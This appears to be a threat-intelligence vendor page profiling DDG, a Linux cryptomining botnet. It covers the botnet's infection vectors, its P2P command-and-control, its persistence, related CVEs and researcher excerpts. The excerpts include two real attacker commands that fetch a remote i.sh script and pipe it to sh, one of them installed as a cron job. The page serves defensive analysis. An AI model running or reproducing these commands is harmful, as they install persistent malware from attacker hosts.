DDG is a Linux-focused cryptocurrency-mining botnet active since at least 2017 and known for targeting exposed servers rather than end-user systems. Its operators have repeatedly updated the malware’s propagation, command-and-control, and mining components over multiple version families, allowing the botnet to remain active over several years. DDG has been associated with large-scale Monero mining and has been observed compromising thousands of servers worldwide, with substantial victim concentrations in China and the United States.
DDG specializes in compromising SSH, Redis, and OrientDB services, and later activity also included exploitation of Nexus Repository Manager and Supervisord. Early campaigns exploited OrientDB remote code execution and abused misconfigured Redis instances, while SSH propagation relied on brute-forcing weak credentials, especially the root account, using an embedded password dictionary. The botnet has also been described as shifting over time from public-facing server infections toward intranet-hosted systems, likely to reduce visibility while preserving mining revenue.
Operationally, DDG evolved from a more traditional infrastructure model using direct IP- and DNS-based command-and-control into increasingly resilient hybrid peer-to-peer designs. Earlier variants used a command-and-control plus hub architecture to distribute payloads and miners, while later versions adopted Memberlist-based peer-to-peer communications and then a self-developed hybrid P2P protocol. This architecture improved survivability by allowing infected nodes to continue mining even when parts of the static infrastructure were disrupted. Some variants received configuration data over HTTP on non-standard ports and exhibited unusual HTTP Host header behavior that aided network detection.
On compromised hosts, DDG deploys mining components, maintains persistence, and removes competing miners or older botnet artifacts. Historical variants used shell scripts to establish recurring execution through cron and to retrieve updated binaries. The malware has been written in Go in multiple documented versions and has used hacked servers as distribution hubs. Researchers have also observed the botnet operators running parallel versions and rotating infrastructure, mining pools, and monetization mechanisms to improve resilience.
DDG is best characterized as a server-targeting cryptomining botnet with brute-force and exploit-driven initial access, persistence through scheduled tasking, and hybrid peer-to-peer command-and-control. Its long operational lifespan, frequent versioning, and infrastructure redundancy make it a notable example of an adaptive Linux mining botnet.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
the only other instance of the CVE-2019-7238 vulnerability being exploited in the wild has been by the DDG botnet.
We name it DDG.Mining.Botnet after its core function module name DDG. Currently we are able to confirm that the botnet has mined more than 3,395 Monroe coins... DDG uses a C2 and HUB layout to communicate with its clients.
21 distinct techniques documented for this family, organized by ATT&CK tactic.
echo "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -
download and execute i.sh ... curl -fsSL http://218.248.40.228:8443/i.sh | sh
Bot deployment : this is where the bot is deployed into a target system member of the network, for instance through an exploit... Alternatively, DDG uses exploits against Redis, Nexus Repository Manager and Supervisord... Additionally, a number of exploits affecting IoT devices such as CCTV, DVR, NVR and routers are included as a supplemental infection method.
cron.sh is a highly obfuscated shell script... The real content after de-obfuscation
The wget and curl commands in the current user cron table are cleared to kill competitors' scheduled tasks.
Bot deployment : this is where the bot is deployed into a target system member of the network, for instance through an exploit, or by brute-forcing the credentials... DDG’s method of infection involves brute-forcing the root user password against SSH servers... FritzFrog... relies on SSH credential brute-forcing as its propagation mechanism... Mozi uses weak Telnet credential brute-forcing as a way to propagate.
Mozi uses weak Telnet credential brute-forcing as a way to propagate... DDG’s method of infection involves brute-forcing the root user password against SSH servers... FritzFrog... relies on SSH credential brute-forcing as its propagation mechanism.
Early-generation botnets followed a client-server model for command and control (C&C), making use of popular protocols like IRC and HTTP... DDG receives its configuration from a super node by leveraging HTTP on non-standard ports.
The attacker goes over all IPs and domain names written in the HUB file to download the mining program, so as to avoid the possible blocking caused by using a single download server.
Threat actors use peer-to-peer (P2P) botnets like these to build a platform that can later be used to carry out malicious operations... The need for increased takedown resistance eventually drove botnet operators to adapt and explore peer-to-peer approaches.
9 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
9 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mentioned only as a comparison point to FritzFrog's brute-force behavior; described as another P2P botnet.
A mining botnet that evolved from DNS-based C2 to a hybrid P2P architecture. It infects systems by brute-forcing SSH root passwords and by exploiting Redis, Nexus Repository Manager, and Supervisord, and receives configuration over HTTP on non-standard ports.
A cryptocurrency-mining botnet targeting primarily servers, especially intranet-hosted systems. It spreads via weak SSH root passwords, evolved from IP/DNS C2 to Memberlist-based P2P and later to a self-developed hybrid P2P protocol for resilience, and continues mining even if static C2 infrastructure is disrupted.
Mentioned as another botnet observed exploiting CVE-2019-7238, used here as a comparison point to highlight earlier Hide 'N Seek exploitation.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.